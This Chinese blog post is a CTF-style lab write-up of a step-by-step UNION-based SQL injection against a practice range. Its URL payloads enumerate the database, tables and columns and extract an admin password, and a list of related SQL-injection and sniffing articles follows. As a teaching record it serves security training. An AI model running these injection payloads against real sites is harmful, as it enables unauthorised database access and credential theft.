一次简单的通过sql注入获取目标用户名和密码的流程

最新推荐文章于 2024-05-13 16:16:13 发布
最新推荐文章于 2024-05-13 16:16:13 发布
阅读量1.3k 收藏 12
点赞数 2
分类专栏: CTF-web刷题记录 文章标签: mysql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slismy/article/details/108922998
版权

靶场环境:封神台

第一步

http://59.63.200.79:8003/?id=2-1
验证注入点存在

第二步

http://59.63.200.79:8003/?id=1 order by 1/2/…
查询到长度为2

第三步

http://59.63.200.79:8003/?id=9.99 union select 1,2
验证数据返回点,返回值为2

第四步

http://59.63.200.79:8003/?id=9.99 union select 1,database()
查询到库名为maoshe

第五步

http://59.63.200.79:8003/?id=9.99 union select 1,table_name from information_schema.tables where table_schema=database()
查询到maoshe库下的表名
admin
dirs
news
xss

第六步

http://59.63.200.79:8003/?id=9.99 union select 1,column_name from information_schema.columns where table_name=‘admin’ and table_schema=database()
查询到admin表下字段名 #group_concat(column_name)
id
username
password

第七步

http://59.63.200.79:8003/?id=9.99 union select 1,password from admin
查询到admin下用户名和密码分别为
admin
hellohack

Bell0ne_
关注
  • 2
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用 Burpsuite 进行POST 方式的SQL注入
枫梓林のBlog
04-25 8061
使用 Burpsuite 进行POST 方式的SQL注入 文章目录使用 Burpsuite 进行POST 方式的SQL注入0x01 Burpsuite介绍1.打开浏览器设置代理2.打开 burp suite0x02 POST 方式注入1.打开 Less-11页面0x03 POST 方式的盲注1.POST 方式的布尔型盲注1.1 Less-152.POST 方式的时间盲注0x04 HTTP 头的注入方式1.HTTP 头注入原理2. HTTP User-Agent 注入Less-183.HTTP Referer
使用burpsuite抓包 + sql工具注入 dvwa初级靶场
太阳照耀我走四方
02-13 2369
一次burpsuite + sqlmap 抓包拿flag
wireshark抓包过程及找到账号密码步骤
最新发布
A16461876592的博客
05-13 553
7、安装完成后打开软件(wireshark),连接方式选择。14.点击最下方选项:即可查看到账号和密码。2.打开下载好的安装包点击下一步进行安装。13.查找POST开头的域名,找到后打开。9.右上角点击立即注册,填写注册信息。3.再需要勾选的页面把所有的选项打勾。10.返回浏览器右上角点击:历史记录。1.从清华大学开源软件镜像站下载。4.软件的默认安装路径无需修改。11.点击小垃圾桶,清除历史记录。12.在搜索栏中输入“http”5、继续点击下一步进行安装。,最后点击跳过完成安装。
作业1:Burp Suite 环境配置及 SQL 注入实验
diligent_lee的博客
07-20 1908
Burp Suite 环境配置及 SQL 注入实验 1. 环境准备 1.1. phpStudy 和 DVWA 首先将老师提供好的 phpstudy2018 解压到合适目录,这里我的解压目录为:D:\Dev\phpStudy。然后将 DVMA 解压并放到 phpstudy 的 WWW目录下,具体目录为:D:\Dev\phpStudy\PHPTutorial\WWW。 启动 phystudy2018,点击“MySQL管理器”,然后点击 “phyMyAdmin”,电脑的默认浏览器会打开数据库的登陆界面,由
安全】【SQL注入漏洞】通过sql注入获取数据库管理员密码
little_stupid_child的专栏
01-21 7733
本博客中使用封神台靶标系统进行演示,靶标系统网站。 一、判断网站是否存在sql注入漏洞 1.在地址栏写入?id=1 and 1=1,回车 页面返回正常。 2.在地址栏写入?id=1 and 1=2,回车 页面返回异常,这里可能存在sql注入漏洞。 二、判断字段数 1.在地址栏写入?id=1 and 1=1 order by 3 页面返回异常,表的字段数小于3 2.在地址栏写入?id=1 and 1=1 order by 2 页面返回正常,说明表的字段数为2。 三、获取回显点 在地址栏写入?id=1
SQL Server密码破解工具简介
01-08 2607
在对SQL Server系统执行入侵测试或者更高级别的安全审计时,有一种测试不应该被忽略,那就是SQL Server密码测试。这一点看起来显而易见,但是很多人都会忽略它。   密码测试可以帮助检查恶意入侵者或者外部攻击者,测试他们要强行进入数据库有多容易,而且还可以确保SQL Server用户对他们的账号负责。此外,测试密码的漏洞在SQL Server混合模式认证的情况下尤其重要,这种模式比其他
sqlmap-sql注入工具
07-06
- **自动检测**:SQLMap能自动检测目标网站是否存在SQL注入漏洞,通过多种技术如盲注、时间延迟注入、错误注入等来探测。 - **枚举与信息收集**:一旦检测到注入,它会枚举数据库管理系统(如MySQL、PostgreSQL等...
通过selenium和flask中转后利用sqlmap进行注入ReberBlog1
08-03
**SQL注入** 是一种常见的网络安全漏洞,攻击者通过在Web表单中输入恶意的SQL语句,以获取或篡改数据库中的敏感信息。在文中,由于登录表单的数据被加密且有签名验证,直接使用sqlmap无法进行注入测试。作者通过...
sql注入源码(mssql,mysql)
03-15
例如,一个简单的登录表单如果没有正确处理用户输入,可能会允许攻击者通过在用户名密码字段中插入SQL语句来绕过身份验证。 2. **文件目录和注册表访问**:在描述中提到的支持列数据库、文件目录和注册表等,意味...
信息安全技术基础:对MySQL数据库进行SQL注入攻击.pdf
11-24
实验还涉及了一个简单的登录系统示例,假设管理员用户名为admin,攻击者可能会尝试通过不断尝试不同的SQL命令来猜解密码,或者利用已知的用户名构造SQL查询,以绕过正常的验证流程。 总的来说,SQL注入攻击是Web...
JSP+Servlet制作Java Web登录功能的全流程解析
01-20
在`doPost`方法中,使用`HttpServletRequest`的`getParameter()`方法获取JSP页面提交的用户名密码。然后,通过`HttpServletResponse`的`sendRedirect()`方法将用户重定向到成功登录后的页面,如`index.jsp`。以下...
网络靶场的靶子——网络蓝军
03-01
网络靶场的标的物,红军的目标靶子。有请网络牛人小试牛刀,闯关有奖!
截获SQL Server客户端登录SQL Server服务器的密码
凤凰涅磐,做不老的程序员
12-07 603
我们都知道,从WinForms应用程序访问数据库服务器,需要使用连接字符串。如果使用的是用户名/密码的方式连接,一般我们都会加密连接字符串来增强安全性。今天才知道,这是远远不够的。 通过网络数据包捕获工具,我们可以截获到SQL Server采用的TDS协议的数据报文。然后可以找到相应的登录报文。 当然,登录用户的密码是经过混淆的,只不过,混淆的方法很简单。非常容易破解。 混淆的过程如下: 将...
通过SQL注入拿到管理员密码
qq_52337463的博客
01-14 4163
该靶场来自于(封神台封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 首先我们看下题目 题目是通过SQL注入拿到管理员后台密码 我们先点开"传送门"打开靶场 靶场已经打开了,我们先点"点击查看新闻"打开页面 看起来没啥有用的信息但是别慌,我们先进行SQL注入 在URL中***/?id=1 后面写命令进行注入 and 1=2 union select 1,concat(username,',',password) from admin 这里的admin...
sql手工注入练习拿flag
太阳照耀我走四方
02-14 2450
sql手工简单注入拿flag
CTF刷题-SQL注入
weixin_43882862的博客
08-08 3416
靶场第二题,SQL注入 题目 链接:http://59.63.200.79:8004/ 解题思路 打开这个链接,我们可以发现是一个新闻门户网站。 这时候试着点击一下新闻动态里面的一条新闻,因为新闻页面的功能往往和数据库有关系,同时发现点开的新闻界面链接是: http://59.63.200.79:8004/shownews.asp?id=171。本能告诉我,这个可能存在SQL注入漏洞。但是这个题目,使用SQL注入漏洞判别方式(输入单引号)提示有错误。使用order by 10又可以访问,说明数据库有10
怎样获取用户及用户组信息
lmd1997130的博客
07-21 885
利用 struct passwd这个结构体就可以获取用户的信息 此结构体如下所示: struct passwd   {     char *pw_name;                /* 用户登录名    */     char *pw_passwd;              /* 密码(加密后)*/     __uid_t pw_uid;             
SQL注入-万能用户名
amagaaaaaa的博客
10-07 468
SQL注入;PHP字符拼接
如何获取数据库SQLserver的用户名密码
04-04
如果你有权限登录 SQL Server,可以通过以下几种方式获取数据库用户名密码: 1. 使用 SQL Server Management Studio 连接数据库,右键点击数据库实例,选择“属性”,在“安全性”选项卡中可以看到“服务器身份...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值